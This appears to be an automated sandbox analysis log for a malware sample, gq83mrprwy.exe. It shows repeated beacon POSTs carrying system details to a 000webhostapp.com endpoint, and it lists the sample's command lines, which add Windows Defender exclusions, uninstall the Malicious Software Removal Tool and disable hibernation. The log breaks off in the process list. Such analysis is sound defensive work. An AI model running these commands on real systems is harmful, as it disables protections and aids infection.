                                                                                                                              2024-04-26 14:48:12 UTC1255INData Raw: 0a 3c 73 63 72 69 70 74 3e 76 61 72 20 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 34 6b 62 52 38 66 30 69 73
                                                                                                                              Data Ascii: <script>var submitCallback = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="4kbR8f0is
                                                                                                                              2024-04-26 14:48:12 UTC1032INData Raw: 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 22 3e 0a 54 68 69 73 20 70 61 67 65 20 61 70 70 65 61 72 73 20 77 68 65 6e 20 47 6f 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74
                                                                                                                              Data Ascii: ; line-height:1.4em;">This page appears when Google automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly aft


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              6192.168.2.44974440.127.169.103443
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-04-26 14:48:21 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=FO+9xhx+5xDkVGm&MD=3ZbB+Dxa HTTP/1.1
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Accept: */*
                                                                                                                              User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                              Host: slscr.update.microsoft.com
                                                                                                                              2024-04-26 14:48:21 UTC560INHTTP/1.1 200 OK
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Pragma: no-cache
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Expires: -1
                                                                                                                              Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                              ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                              MS-CorrelationId: b023e083-0215-4b29-9786-80c6301737ee
                                                                                                                              MS-RequestId: 68210b24-5eae-4125-ac50-5ec3c29f9822
                                                                                                                              MS-CV: HKTPMJvS4kSgP1T8.0
                                                                                                                              X-Microsoft-SLSClientCache: 2880
                                                                                                                              Content-Disposition: attachment; filename=environment.cab
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Date: Fri, 26 Apr 2024 14:48:21 GMT
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 24490
                                                                                                                              2024-04-26 14:48:21 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                              Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                              2024-04-26 14:48:21 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                              Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              7192.168.2.449753145.14.144.2534434488C:\Windows\explorer.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-04-26 14:48:32 UTC197OUTPOST /api/endpoint.php HTTP/1.1
                                                                                                                              Accept: */*
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 484
                                                                                                                              Content-Type: application/json
                                                                                                                              Host: pachydermal-deviati.000webhostapp.com
                                                                                                                              User-Agent: cpp-httplib/0.12.6
                                                                                                                              2024-04-26 14:48:32 UTC484OUTData Raw: 7b 22 69 64 22 3a 22 72 64 75 72 78 6e 6c 6d 74 69 78 66 63 70 78 72 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 30 35 31 38 32 39 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 59 53 54 45 4d 22 2c 22 67 70 75 22 3a 22 50 58 42 4b 4d 5f 4f 22 2c 22 63 70 75 22 3a 22 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 2c 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 22 2c 22 72 65 6d 6f 74 65 63 6f 6e 66 69 67 22 3a 22 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 33 2e 34 2e 30 22 2c 22 61 63 74 69 76 65 77 69 6e 64 6f 77 22 3a 22 52 75 6e 6e 69 6e 67 20 61 73 20 53 79 73 74 65 6d 22 2c 22 72 75 6e 74 69 6d 65 22 3a 33 2c
                                                                                                                              Data Ascii: {"id":"rdurxnlmtixfcpxr","computername":"051829","username":"SYSTEM","gpu":"PXBKM_O","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.0","activewindow":"Running as System","runtime":3,
                                                                                                                              2024-04-26 14:48:32 UTC304INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 26 Apr 2024 14:48:33 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              X-Robots-Tag: noindex, nofollow
                                                                                                                              Server: awex
                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              X-Request-ID: 21cfdd90ae429e7b7eb015eb92ffab10
                                                                                                                              2024-04-26 14:48:32 UTC23INData Raw: 31 31 0d 0a 7b 22 72 65 73 70 6f 6e 73 65 22 3a 22 6f 6b 22 7d 0d 0a
                                                                                                                              Data Ascii: 11{"response":"ok"}
                                                                                                                              2024-04-26 14:48:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              8192.168.2.44975513.85.23.86443
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-04-26 14:48:59 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=FO+9xhx+5xDkVGm&MD=3ZbB+Dxa HTTP/1.1
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Accept: */*
                                                                                                                              User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                              Host: slscr.update.microsoft.com
                                                                                                                              2024-04-26 14:49:00 UTC560INHTTP/1.1 200 OK
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Pragma: no-cache
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Expires: -1
                                                                                                                              Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                              ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_2160"
                                                                                                                              MS-CorrelationId: fda3a476-e7c4-43ad-b075-103dbdb9d695
                                                                                                                              MS-RequestId: b8cba2c9-ff63-4ea2-ae10-8f2ce9d1ff23
                                                                                                                              MS-CV: YfircFfu3EGQg4T2.0
                                                                                                                              X-Microsoft-SLSClientCache: 2160
                                                                                                                              Content-Disposition: attachment; filename=environment.cab
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Date: Fri, 26 Apr 2024 14:48:59 GMT
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 25457
                                                                                                                              2024-04-26 14:49:00 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 51 22 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 db 8e 00 00 14 00 00 00 00 00 10 00 51 22 00 00 20 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 f3 43 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 0d 92 6f db e5 21 f3 43 43 4b ed 5a 09 38 55 5b df 3f 93 99 90 29 99 e7 29 ec 73 cc 4a 66 32 cf 84 32 64 c8 31 c7 11 52 38 87 90 42 66 09 99 87 32 0f 19 0a 09 51 a6 a8 08 29 53 86 4a 52 84 50 df 46 83 ba dd 7b df fb 7e ef 7d ee 7d bf ef 9e e7 d9 67 ef 35 ee b5 fe eb 3f ff b6 96 81 a2 0a 04 fc 31 40 21 5b 3f a5 ed 1b 04 0e 85 42 a0 10 04 64 12 6c a5 de aa a1 d8 ea f3 58 01 f2 f5 67 0b 5e 9b bd e8 a0 90 1d bf 40 88 9d eb 49 b4 87 9b ab 8b 9d 2b 46 c8 c7 c5 19 92
                                                                                                                              Data Ascii: MSCFQ"DQ" AdCenvironment.cabo!CCKZ8U[?))sJf22d1R8Bf2Q)SJRPF{~}}g5?1@![?BdlXg^@I+F
                                                                                                                              2024-04-26 14:49:00 UTC9633INData Raw: 21 6f b3 eb a6 cc f5 31 be cf 05 e2 a9 fe fa 57 6d 19 30 b3 c2 c5 66 c9 6a df f5 e7 f0 78 bd c7 a8 9e 25 e3 f9 bc ed 6b 54 57 08 2b 51 82 44 12 fb b9 53 8c cc f4 60 12 8a 76 cc 40 40 41 9b dc 5c 17 ff 5c f9 5e 17 35 98 24 56 4b 74 ef 42 10 c8 af bf 7f c6 7f f2 37 7d 5a 3f 1c f2 99 79 4a 91 52 00 af 38 0f 17 f5 2f 79 81 65 d9 a9 b5 6b e4 c7 ce f6 ca 7a 00 6f 4b 30 44 24 22 3c cf ed 03 a5 96 8f 59 29 bc b6 fd 04 e1 70 9f 32 4a 27 fd 55 af 2f fe b6 e5 8e 33 bb 62 5f 9a db 57 40 e9 f1 ce 99 66 90 8c ff 6a 62 7f dd c5 4a 0b 91 26 e2 39 ec 19 4a 71 63 9d 7b 21 6d c3 9c a3 a2 3c fa 7f 7d 96 6a 90 78 a6 6d d2 e1 9c f9 1d fc 38 d8 94 f4 c6 a5 0a 96 86 a4 bd 9e 1a ae 04 42 83 b8 b5 80 9b 22 38 20 b5 25 e5 64 ec f7 f4 bf 7e 63 59 25 0f 7a 2e 39 57 76 a2 71 aa 06 8a
                                                                                                                              Data Ascii: !o1Wm0fjx%kTW+QDS`v@@A\\^5$VKtB7}Z?yJR8/yekzoK0D$"<Y)p2J'U/3b_W@fjbJ&9Jqc{!m<}jxm8B"8 %d~cY%z.9Wvq


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              9192.168.2.449764145.14.144.2534434488C:\Windows\explorer.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-04-26 14:49:28 UTC197OUTPOST /api/endpoint.php HTTP/1.1
                                                                                                                              Accept: */*
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 500
                                                                                                                              Content-Type: application/json
                                                                                                                              Host: pachydermal-deviati.000webhostapp.com
                                                                                                                              User-Agent: cpp-httplib/0.12.6
                                                                                                                              2024-04-26 14:49:28 UTC500OUTData Raw: 7b 22 69 64 22 3a 22 72 64 75 72 78 6e 6c 6d 74 69 78 66 63 70 78 72 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 30 35 31 38 32 39 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 59 53 54 45 4d 22 2c 22 67 70 75 22 3a 22 50 58 42 4b 4d 5f 4f 22 2c 22 63 70 75 22 3a 22 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 2c 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 22 2c 22 72 65 6d 6f 74 65 63 6f 6e 66 69 67 22 3a 22 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 33 2e 34 2e 30 22 2c 22 61 63 74 69 76 65 77 69 6e 64 6f 77 22 3a 22 52 75 6e 6e 69 6e 67 20 61 73 20 53 79 73 74 65 6d 22 2c 22 72 75 6e 74 69 6d 65 22 3a 36 30
                                                                                                                              Data Ascii: {"id":"rdurxnlmtixfcpxr","computername":"051829","username":"SYSTEM","gpu":"PXBKM_O","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.0","activewindow":"Running as System","runtime":60
                                                                                                                              2024-04-26 14:49:29 UTC304INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 26 Apr 2024 14:49:29 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              X-Robots-Tag: noindex, nofollow
                                                                                                                              Server: awex
                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              X-Request-ID: e1e42ee8aec5ece4a52bc7cee58361f8
                                                                                                                              2024-04-26 14:49:29 UTC7INData Raw: 32 0d 0a 7b 7d 0d 0a
                                                                                                                              Data Ascii: 2{}
                                                                                                                              2024-04-26 14:49:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              10192.168.2.449774145.14.144.164434488C:\Windows\explorer.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-04-26 14:50:29 UTC197OUTPOST /api/endpoint.php HTTP/1.1
                                                                                                                              Accept: */*
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 501
                                                                                                                              Content-Type: application/json
                                                                                                                              Host: pachydermal-deviati.000webhostapp.com
                                                                                                                              User-Agent: cpp-httplib/0.12.6
                                                                                                                              2024-04-26 14:50:29 UTC501OUTData Raw: 7b 22 69 64 22 3a 22 72 64 75 72 78 6e 6c 6d 74 69 78 66 63 70 78 72 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 30 35 31 38 32 39 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 59 53 54 45 4d 22 2c 22 67 70 75 22 3a 22 50 58 42 4b 4d 5f 4f 22 2c 22 63 70 75 22 3a 22 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 2c 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 22 2c 22 72 65 6d 6f 74 65 63 6f 6e 66 69 67 22 3a 22 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 33 2e 34 2e 30 22 2c 22 61 63 74 69 76 65 77 69 6e 64 6f 77 22 3a 22 52 75 6e 6e 69 6e 67 20 61 73 20 53 79 73 74 65 6d 22 2c 22 72 75 6e 74 69 6d 65 22 3a 31 32
                                                                                                                              Data Ascii: {"id":"rdurxnlmtixfcpxr","computername":"051829","username":"SYSTEM","gpu":"PXBKM_O","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.0","activewindow":"Running as System","runtime":12
                                                                                                                              2024-04-26 14:50:29 UTC304INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 26 Apr 2024 14:50:30 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              X-Robots-Tag: noindex, nofollow
                                                                                                                              Server: awex
                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              X-Request-ID: f0039a40895a274f1d22ddc0067a69e3
                                                                                                                              2024-04-26 14:50:29 UTC7INData Raw: 32 0d 0a 7b 7d 0d 0a
                                                                                                                              Data Ascii: 2{}
                                                                                                                              2024-04-26 14:50:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              11192.168.2.449782145.14.144.164434488C:\Windows\explorer.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-04-26 14:51:28 UTC197OUTPOST /api/endpoint.php HTTP/1.1
                                                                                                                              Accept: */*
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 500
                                                                                                                              Content-Type: application/json
                                                                                                                              Host: pachydermal-deviati.000webhostapp.com
                                                                                                                              User-Agent: cpp-httplib/0.12.6
                                                                                                                              2024-04-26 14:51:28 UTC500OUTData Raw: 7b 22 69 64 22 3a 22 72 64 75 72 78 6e 6c 6d 74 69 78 66 63 70 78 72 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 30 35 31 38 32 39 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 59 53 54 45 4d 22 2c 22 67 70 75 22 3a 22 50 58 42 4b 4d 5f 4f 22 2c 22 63 70 75 22 3a 22 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 2c 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 22 2c 22 72 65 6d 6f 74 65 63 6f 6e 66 69 67 22 3a 22 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 33 2e 34 2e 30 22 2c 22 61 63 74 69 76 65 77 69 6e 64 6f 77 22 3a 22 52 75 6e 6e 69 6e 67 20 61 73 20 53 79 73 74 65 6d 22 2c 22 72 75 6e 74 69 6d 65 22 3a 31 38
                                                                                                                              Data Ascii: {"id":"rdurxnlmtixfcpxr","computername":"051829","username":"SYSTEM","gpu":"PXBKM_O","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.0","activewindow":"Running as System","runtime":18
                                                                                                                              2024-04-26 14:51:28 UTC304INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 26 Apr 2024 14:51:29 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              X-Robots-Tag: noindex, nofollow
                                                                                                                              Server: awex
                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              X-Request-ID: 450f45adaf79694493bbe493c05e21de
                                                                                                                              2024-04-26 14:51:28 UTC7INData Raw: 32 0d 0a 7b 7d 0d 0a
                                                                                                                              Data Ascii: 2{}
                                                                                                                              2024-04-26 14:51:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 0


                                                                                                                              Click to jump to process

                                                                                                                              Click to jump to process

                                                                                                                              Click to dive into process behavior distribution

                                                                                                                              Click to jump to process

                                                                                                                              Target ID:0
                                                                                                                              Start time:16:48:02
                                                                                                                              Start date:26/04/2024
                                                                                                                              Path:C:\Users\user\Desktop\gq83mrprwy.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Users\user\Desktop\gq83mrprwy.exe"
                                                                                                                              Imagebase:0x7ff7970c0000
                                                                                                                              File size:2'653'184 bytes
                                                                                                                              MD5 hash:3B43DA1BE0C39802B78F6B2C55C4D7E6
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:low
                                                                                                                              Has exited:true

                                                                                                                              Target ID:1
                                                                                                                              Start time:16:48:02
                                                                                                                              Start date:26/04/2024
                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                              Imagebase:0x7ff788560000
                                                                                                                              File size:452'608 bytes
                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:2
                                                                                                                              Start time:16:48:02
                                                                                                                              Start date:26/04/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:4
                                                                                                                              Start time:16:48:06
                                                                                                                              Start date:26/04/2024
                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
                                                                                                                              Imagebase:0x7ff76e190000
                                                                                                                              File size:3'242'272 bytes
                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:false

                                                                                                                              Target ID:5
                                                                                                                              Start time:16:48:07
                                                                                                                              Start date:26/04/2024
                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                              Imagebase:0x7ff6eef20000
                                                                                                                              File size:55'320 bytes
                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:false

                                                                                                                              Target ID:6
                                                                                                                              Start time:16:48:07
                                                                                                                              Start date:26/04/2024
                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2432 --field-trial-handle=1932,i,323240388522049765,3171702959307320635,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                              Imagebase:0x7ff76e190000
                                                                                                                              File size:3'242'272 bytes
                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:false

                                                                                                                              Target ID:8
                                                                                                                              Start time:16:48:14
                                                                                                                              Start date:26/04/2024
                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                              Imagebase:0x7ff7c00d0000
                                                                                                                              File size:289'792 bytes
                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:10
                                                                                                                              Start time:16:48:14
                                                                                                                              Start date:26/04/2024
                                                                                                                              Path:C:\Windows\System32\powercfg.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                              Imagebase:0x7ff6933f0000
                                                                                                                              File size:96'256 bytes
                                                                                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:moderate
                                                                                                                              Has exited:true

                                                                                                                              Target ID:11
                                                                                                                              Start time:16:48:14
                                                                                                                              Start date:26/04/2024
                                                                                                                              Path:C:\Windows\System32\powercfg.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                              Imagebase:0x7ff6933f0000
                                                                                                                              File size:96'256 bytes
                                                                                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
